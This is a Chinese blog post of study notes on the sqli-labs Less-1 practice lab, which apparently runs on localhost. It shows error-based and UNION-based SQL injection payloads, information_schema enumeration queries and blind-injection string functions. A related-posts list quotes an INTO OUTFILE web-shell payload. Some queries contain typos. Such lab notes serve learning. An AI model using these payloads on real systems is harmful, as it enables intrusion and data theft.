sqli-labs less-1

最新推荐文章于 2024-08-18 20:55:34 发布
最新推荐文章于 2024-08-18 20:55:34 发布
阅读量482 收藏
点赞数 2
分类专栏: 笔记 文章标签: less 前端 css
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zbbjya/article/details/122460579
版权

请输入id作为带数值的参数

==================================================----------=======

输入

?id=1

 我们会看到这个sql语句是我们添加进去的,原本是应该没有的

 limit 0.1;其中第一位是从第几个开始的,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据

 再输入加一个单引号我们会发现报错了(单引号判断 ‘ 显示数据库错误信息或者页面回显不同(整形,字符串类型判断)

)

​

?id=1'

 

 一个一个的试

127.0.0.1/sqli-labs-master/Less-1/?id=1 order by3--+

less-01数据存在三列

 

=======================================================================

输入

​?id=1 union select 1,2,3--+

 发现没有变化

我们将id=1的数据注释掉        查看哪些数据可以回显                                    发现有回显

?id=-1' union select 1,2,3--+

知识点汇总

--+, --, # (都是sql语句里面的注释符,注释之后后面的句子不再进行执行)

A and B(全对才为true) and 、&& 和运算,要所有条件成立才能执行

A or B(只要有一个是对的都为)  or  、 || 或运算,只要一个条件成立

order by()字段数查询

order by 后加一个数字表示第几列进行排序。用此函数判断该数据库由几列组成

在index的文件中

echo $sql;(将我们构造的sql语句进行输出)

echo "<br>";(换行符让我们浏览的时候更加方便)

group_concat() 将所有的数据进行连接和拼接之后作为一行显示

查库:select schema_name from information_schema.schemata

查表:select table_name from information_schema.table where table_schema='security'

查列:select column_name form information_schema.columns where table_name='users'

查字段:select username,password from security.users

left()函数:left(database(),1)='s'   left(a,b)从左侧截取a的前b位,正确返回值1,错位返回值0

regexp函数:select user()regexp 'r'  user()结果是root,regexp为匹配root的正则表达式

like函数:select user()like 'ro%'   匹配与regexp相似

sbustr(a,b,c) select substr()xxx           substr(a,b,c)从位置b开始,截取a字符串c位的长度

ascii()                                               将某个字符串转化位ascii值

chr('数字') 或者ord('字母')               使用python中的两个函数可以判断当前的ascii值是多少

left()函数:left(database(),1)='s'  left(a,b)从左侧截取a的前b位,正确返回值1,错位返回值0
regexp函数:select user()regexp 'r'user()结果是root,regexp为匹配root的正则表达式
like函数:select user()like 'ro%'  匹配与regexp相似
sbustr(a,b,c) select substr()xxx    substr(a,b,c)从位置b开始,截取a字符串c位的长度
ascii()            将某个字符串转化位ascii值
chr('数字') 或者ord('字母')     使用python中的两个函数可以判断当前的ascii值是多少
对于security数据库
select left(database(),1)='s';前一位是否是s

select database()regexp 's';

匹配第一个字符是否是s
select database()like 's%';匹配第一个字符是否是s

select substr((select database()),1,1)='s';

匹配的第一个字符是否是s
select substr((select database()),1,3)='sec'

匹配的前三个字符是否是sec

select ascii(substr(select database()),1,1);直接回显115 或者是:
select ascii(substr(select database()),1,1)>100;如果大于110,就会返回1,否则返回0

zbbjya
关注
专栏目录
sqli less1
klxxxxxx的博客
10-23 2676
sqli-labs less-1 前言 鄙人不才,只是把平时学习的笔记整理下来,仅供参考,望大家指点。 首先我们需要了解,什么是sql注入? SQL注入是比较常见的网络攻击方式,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写代码时的疏忽,导致他人可以通过操作输入来修改后台SQL语句达到代码执行,进行攻击的后果 注入手法的分类 注入手法可以分为: 联合查询注入、报错型注入、布尔型注入、延时注入、堆叠注入 从数据类型可以分为: 字符型、数值型 从注入位置可以分类为: GET数据(提交数据的方式为G
sqli-labs Less-1、Less-9\Less-15 python脚本
ChamZhiZe的博客
12-21 1258
虽然这个很简单,但是还是写个脚本跑一下 Less-1 from http.client import PROCESSING, responses from re import I, T from typing import FrozenSet from bs4.dammit import xml_encoding from bs4.element import ProcessingInstruction import requests import urllib.request from colorama
sqli-labs(less-1)
墨鱼菜鸡
09-10 413
目录 less-1(union联合注入) 1.根据注入位置数据类型将sql注入分类(以localhost/sqli-labs/less-1为例子) 2.利用order判断字段数 3.利用union select 联合查询,将id值设置成不成立,即可探测到可利用字段数 4.利用函数database(),user(),version()可以得到...
SqliLab-Less1通关详解
最新发布
Yian123456的博客
08-18 360
导致攻击者可以通过破坏原有SQL语句,拼接新的SQL语句进行查询,从而导致数据库、数据表、用户名、密码等重要信息泄露。Less第一关,Web页面提示我们,请输入ID作为参数,并附带数值。1、首先,使用id=1以及id=1’来注入,结果分别如下图所示。,是因为在开发过程中,代码并未对用户输入的数据进行。1、判断注入类型(数字型还是字符型)2、使用Order by继续进行注入。Sql注入产生的原理是发生在。5、爆破当前库下面有哪些表。7、爆破表中具体数据。
Sqli-Labs之less-1
ISNS的博客
02-03 1794
说在开头:文章是我通过查询资料后按照自己的理解总结来的,所以如果有说法不对的地方,欢迎大佬指正~ 1.进入less-1的题目以后,我们可以看到这道题的提示“请输入ID作为带数值的参数”: 2.我们根据题目提示,尝试在URL中加上“?id=1”、“?id=2”,可以看到看到从数据库中查询到的用于登录login的用户名和密码: 我们要找的是网站后台管理员的用户名和密码,目的是拿到网站的权限,从...
Sqli-labs之Less-1
→_→
03-11 1017
我们先来看看这个环境有哪些题: 接下来开始我们的学习之旅吧! Less-1 翻译:GET-基于错误-单引号-字符串 欢迎 Dh...
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs Less-1
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-30 283
sqli-labs Less-11.字符型SQL注入的关键是单引号的闭合2.MySQL数据库对于单引号的规则如下:3.如何判断是否是字符型注入4.猜字段数方法一:方法二:4.使用联合查询查看页面是否有显示位5.爆数据库版本和当前数据库名6.爆所有数据库7.爆当前数据库所有表8.查询当前数据库users表所有字段9.查询数据 MySQL中的information_schema数据库表说明: ...
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1965
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs之less1
weixin_44791273的博客
09-10 238
题目提示输入id作为参数数值 浏览器通常使用 ? 来表示GET方法传递参数,而使用POST传递参数是不会显示到URL中的。 首先尝试传递 id=0 传递id=1试一下 发现查询成功,证明1是存在的 下面接着以0为例子 加上 ‘ 来试试 %27 是指 ’ 的编码 发现页面回显且报错 报错信息的最后面的内容:use near ’‘0’‘ LIMIT 0,1’ at line 1 ,仔细观察,我们都知道php的语句如果有 ’ 的话,肯定要有另一个 ‘ 来进行闭合,不然就是不完整的语句。那我们不妨.
sqli-labs (less-1)
kukudeshuo的博客
03-07 241
sqli-labs (less-1) SQL注入介绍 SQL注入就是指Web应用程序对用户输入数据的合法性判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作 sql注入漏洞的产生需要满足以下两个条件: 1.参数用户可控:前端传给后端的参数内容是用户可以控制的。 2.参数代入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询。 Mysql5.0之后的版本,数据库里面会默认存放一个information_schema的库,这个库可以说
Sqli-lab:Less-1教程
m0_72286569的博客
01-28 620
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入。
Sqli-labs Less-1
Jiajiajiang_的博客
11-02 329
基于错误的SQL注入 Less-1 Less-1 基于错误的单引号注入 1、测试漏洞是否存在 1)id=1时,正常执行 http://127.0.0.1/sqlilabs/Less-1/?id=1 2)id=1'时,报错,说明可能存在SQL注入 http://127.0.0.1/sqlilabs/Less-1/?id=1' 从上述错误当中,我们可以看到提交到SQL语句...
sqli-labs【less-1】
qq_50673174的博客
08-15 230
剩下查询内容的操作就和一般的sql操作相同了,我们直接在本地mysql上实践,证实了我们先前的猜测,网页上所显示的内容是users表中的username和password的数据,而不回显id。靶场为sqli-labs(github上可以下载安装包,然后安装到phpStudy的www目录下,再修改一下里面的数据库信息就好了,我连接的本地数据库,root账户)另外, 在知道网站根目录的情况下,我们还可以通过sql语句上传木马。因为学习的需求,我开始了靶场的练习。通过联合查询的方式,我们基本上获取了所有的信息。.
sqli-labs-less-1完整解析,小白干货
yzcn
10-22 2035
Less-1 Sql知识点: Limit(x,y):从x+1行开始输,共输y行 Order by:排序,asc升序(默认),desc(降序) Union:MySQL执行两条SELECT语句,并把输组合成单个查询结果集 Group_concat:连接作用,group_concat( 要连接的字段 ) [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] concat_ws:concat_ws(‘-’,a,b) 将a和b用-连接起来 MySQL中默认建立的数据库:
sqli-labs less 1(菜鸟,刚学手工注入写的笔记)
qq_60829702的博客
09-17 1332
这也是我刚开始学手工注入,笔记写的还不够全面,里面少了一些注释,知识点还不全面,但我认为写的太全面对于像我一样刚接触的菜鸟不太好,因为写的太详细就会让自己产生一种错觉,认为自己已经懂了,就直接跳过这些东西,这种习惯不太好。还是要自己去查资料,去看一些官方的解释文档。下面这个博主的视频讲的也很好非常适合入门,大家如果不懂可以看这个大佬的视频。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值